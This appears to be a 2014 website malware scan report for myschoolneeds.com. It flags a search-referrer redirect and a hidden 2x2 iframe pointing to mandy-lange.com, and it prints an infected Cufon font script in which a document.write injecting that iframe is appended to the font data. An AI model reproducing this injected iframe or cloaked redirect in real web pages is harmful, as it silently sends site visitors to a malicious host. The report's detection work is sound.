Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.myschoolneeds.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.myschoolneeds.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 12:53:23 GMT Location: http://mandy-lange.com/mapn.html Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.myschoolneeds.com/ | 200 OK Content-Length: 1235 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://mandy-lange.com/mapn.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mandy-lange.com/mapn.html> | ||
http://cufon.shoqolate.com/js/cufon-yui.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 13:38:33 GMT Location: http://cdnjs.cloudflare.com/ajax/libs/cufon/1.09i/cufon-yui.js Server: lighttpd/1.4.19 Content-Length: 0 | clean |
http://cdnjs.cloudflare.com/ajax/libs/cufon/1.09i/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://www.myschoolneeds.com/comic_400.font.js | 200 OK Content-Length: 37901 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":178,"face":{"font-family":"comic","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 0 0 0 0 0 0 0","ascent":"288","descent":"-72","bbox":"-60 -301.896 383.406 73.5602","underline-thickness":"26.3672","underline-position":"-24.9609","unicode-range":"U+0020-U+F002"},"glyphs":{" ":{"w":114},"\u00a0":{"w":114},"!":{"d":"38,-94v34,-67,28,-69,63,-155v11,-16,57,-6,86,-7v8,0,12,2,12,8v0,13,-20,40,-60,81v-29,45,-43,66,-43,74v-13,3,-40,0,-58,-1x Cufon.replace('#box', { fontFamily: 'comic' }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mandy-lange.com/mapn.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mandy-lange.com/mapn.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mandy-lange.com/mapn.html> | ||
http://www.myschoolneeds.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myschoolneeds.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://myschoolneeds.com/
Result: myschoolneeds.com is not infected or malware details are not published yet.
Result: myschoolneeds.com is not infected or malware details are not published yet.